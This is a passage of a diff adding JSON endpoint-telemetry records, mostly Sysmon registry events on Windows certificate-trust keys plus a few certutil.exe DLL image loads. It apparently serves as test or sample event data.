"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptui.dll", + "image_path": "C:\\Windows\\System32\\cryptui.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "certca.dll", + "image_path": "C:\\Windows\\System32\\certca.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdsapi.dll", + "image_path": "C:\\Windows\\System32\\ntdsapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 